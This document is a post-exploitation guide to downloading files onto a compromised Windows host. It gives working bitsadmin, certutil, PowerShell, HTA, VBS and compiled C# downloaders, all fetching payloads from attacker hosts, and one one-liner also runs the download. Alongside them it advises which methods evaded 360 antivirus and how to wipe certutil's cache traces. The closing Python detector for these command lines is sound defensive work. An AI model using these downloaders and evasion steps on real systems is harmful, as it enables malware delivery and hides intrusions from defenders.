Post-exploitation upload (getting files onto the target)

Downloading files with bitsadmin

bitsadmin is a console tool for creating download or upload jobs (BITS jobs) and monitoring their progress. It has shipped with Windows since XP and is still present on current versions, although Microsoft has deprecated it in favour of the BITS PowerShell cmdlets (Start-BitsTransfer). Creating and running your own transfer job does not require administrator rights (those are only needed to inspect or manage jobs owned by other users). Two caveats: the destination directory must already exist, because BITS will not create it, and a bitsadmin download is a well-known pattern that antivirus products detect and block.

Syntax:
bitsadmin /transfer job_name /download /priority priority URL local\path\file

Example (the /download and /priority switches are optional; download is the default and the priority defaults to normal):
bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe

Downloading files with csc.exe (the Windows C# compiler)

Use csc.exe, which ships with the .NET Framework on Windows, to compile the C# source below into download.exe; running that program performs the download. The path contains the framework version: v2.0.50727 is the .NET 2.0/3.5 compiler, while on current systems the compiler lives under C:\Windows\Microsoft.NET\Framework\v4.0.30319\ (or Framework64\ for the 64-bit build), so check which directories exist on the target first.

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:c:\test\download.exe download.cs

download.cs

using System.Net;

namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.1.1/1.exe";
            // Target directory; it must already exist (WebClient does not create it)
            string receivePath = @"C:\test\";
            // Save under the last path segment of the URL, i.e. C:\test\1.exe
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName(URLAddress));
        }
    }
}

Downloading files with PowerShell

Running this PowerShell one-liner directly is generally intercepted by antivirus; on Windows 10 and later the script content is also passed to AMSI before execution, so the WebClient download string itself is a signature.

powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'

Downloading files with HTA

Save the following with a .hta extension and run it (double-clicking hands it to mshta.exe); 360 antivirus did not intercept it.

<html>
<head>
<script>
// Synchronous GET through MSXML. The original used the name "Object", which
// shadows the JScript global object; a plain variable name is used here.
var req = new ActiveXObject("MSXML2.XMLHTTP");
req.open("GET", "http://ip/evil.dtd", false);
req.send();
if (req.Status == 200)
{
    // ADODB.Stream in binary mode (Type = 1) so the bytes are written unchanged
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1;
    stream.Write(req.ResponseBody);
    stream.SaveToFile("C:\\test\\evil.dtd", 2); // 2 = adSaveCreateOverWrite
    stream.Close();
}
window.close();
</script>
<HTA:APPLICATION WINDOWSTATE="minimize">
</head>
<body>
</body>
</html>

Downloading files with VBS

Save the following with a .vbs extension and run it (wscript.exe or cscript.exe); 360 antivirus did not intercept it.

' Synchronous GET through MSXML (third argument 0 = not asynchronous)
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")   ' not used below; kept for running the file afterwards
Post.Open "GET", "http://192.168.1.1/evil.dtd", 0
Post.Send()
If Post.Status = 200 Then
    ' Write the response body to disk through ADODB.Stream in binary mode
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3   ' adModeReadWrite
    aGet.Type = 1   ' adTypeBinary
    aGet.Open()
    aGet.Write(Post.responseBody)
    aGet.SaveToFile "C:\test\vps_success.dtd", 2   ' 2 = adSaveCreateOverWrite
    aGet.Close
End If

Downloading files with certutil

Run directly from cmd. The -split switch is what makes certutil write the fetched file to disk; -urlcache also leaves a copy in the user's CryptnetUrlCache directory, which defenders look for, so clear it afterwards with certutil -urlcache * delete.

Save under a specified file name:
certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php
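Every technique on this page (bitsadmin, csc.exe, the PowerShell WebClient one-liner, the HTA run by mshta.exe, the VBS run by wscript.exe, and certutil) shows up as a distinctive process command line, which is why antivirus and EDR catch them. The following is an added example, not code from the original page: a small Python detector that runs a command-line signature for each of the six techniques over constructed Sysmon-style process-creation log lines. The host name, timestamps, .hta/.vbs file names and log format are made up for the example; the commands themselves are the ones shown above. The rules are plain-text matches, so an encoded or obfuscated PowerShell command would have to be decoded before they apply.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One rule per download technique on this page, matched against the full process
# command line (Sysmon Event ID 1 / Security 4688). Plain-text rules: an
# encoded PowerShell command (-enc ...) has to be decoded before they apply.
RULES = [
    # bitsadmin /transfer <job> <URL> <local file>
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*https?://", re.I)),
    # csc.exe /out:<x>.exe <y>.cs : compiling a downloader on the host itself
    ("csc_compile",
     re.compile(r"\bcsc(?:\.exe)?\b.*/out:\S+\.exe\b.*\.cs\b", re.I)),
    # powershell ... (New-Object System.Net.WebClient).DownloadFile(...)
    ("powershell_webclient",
     re.compile(r"\bpowershell(?:\.exe)?\b.*(?:Net\.WebClient|DownloadFile|DownloadString)", re.I)),
    # mshta.exe <file>.hta (host process for the HTA/JScript downloader)
    ("mshta_hta",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:\.hta\b|https?://)", re.I)),
    # wscript.exe / cscript.exe <file>.vbs
    ("wscript_vbs",
     re.compile(r"\b[wc]script(?:\.exe)?\b.*\.vbs\b", re.I)),
    # certutil -urlcache -split -f <URL> <local file>
    ("certutil_urlcache",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
]

# Pull the remote URL out of the command line when one is visible.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


@dataclass
class Hit:
    rule: str            # name of the matching rule
    url: Optional[str]   # remote URL if present in the command line
    cmdline: str


def classify(cmdline: str) -> Optional[Hit]:
    """Return a Hit for the first matching download rule, or None if nothing matches."""
    for name, rx in RULES:
        if rx.search(cmdline):
            m = URL_RE.search(cmdline)
            return Hit(name, m.group(0) if m else None, cmdline)
    return None


def scan(log_lines: List[str]) -> List[Hit]:
    """Scan 'CommandLine=...' log lines and return every hit, in log order."""
    hits = []
    for line in log_lines:
        _, sep, cmd = line.partition("CommandLine=")
        if sep:                       # skip lines without a command-line field
            hit = classify(cmd.strip())
            if hit:
                hits.append(hit)
    return hits


# Constructed Sysmon-style log lines for the example (host name, timestamps and
# the .hta/.vbs file names are made up; the commands are the ones on this page).
SAMPLE_LOG = [
    r"2024-01-01T10:00:01 HOST1 EventID=1 CommandLine=bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe",
    r"2024-01-01T10:00:02 HOST1 EventID=1 CommandLine=C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:c:\test\download.exe download.cs",
    r"2024-01-01T10:00:03 HOST1 EventID=1 CommandLine=powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'",
    r'2024-01-01T10:00:04 HOST1 EventID=1 CommandLine="C:\Windows\System32\mshta.exe" "C:\test\dl.hta"',
    r'2024-01-01T10:00:05 HOST1 EventID=1 CommandLine="C:\Windows\System32\wscript.exe" "C:\test\dl.vbs"',
    r"2024-01-01T10:00:06 HOST1 EventID=1 CommandLine=certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php",
    # benign activity that must not fire
    r"2024-01-01T10:00:07 HOST1 EventID=1 CommandLine=certutil.exe -hashfile C:\test\1.exe SHA256",
    r"2024-01-01T10:00:08 HOST1 EventID=1 CommandLine=C:\Windows\system32\svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"{h.rule:22} url={h.url!s:28} {h.cmdline[:60]}")
```

The csc.exe rule is the weakest of the six on its own, since developers compile legitimately; in practice it is paired with the parent process (cmd.exe or a web-server worker spawning csc.exe is the interesting case). The certutil -hashfile line is included to show that the rule keys on -urlcache plus a URL rather than on certutil itself.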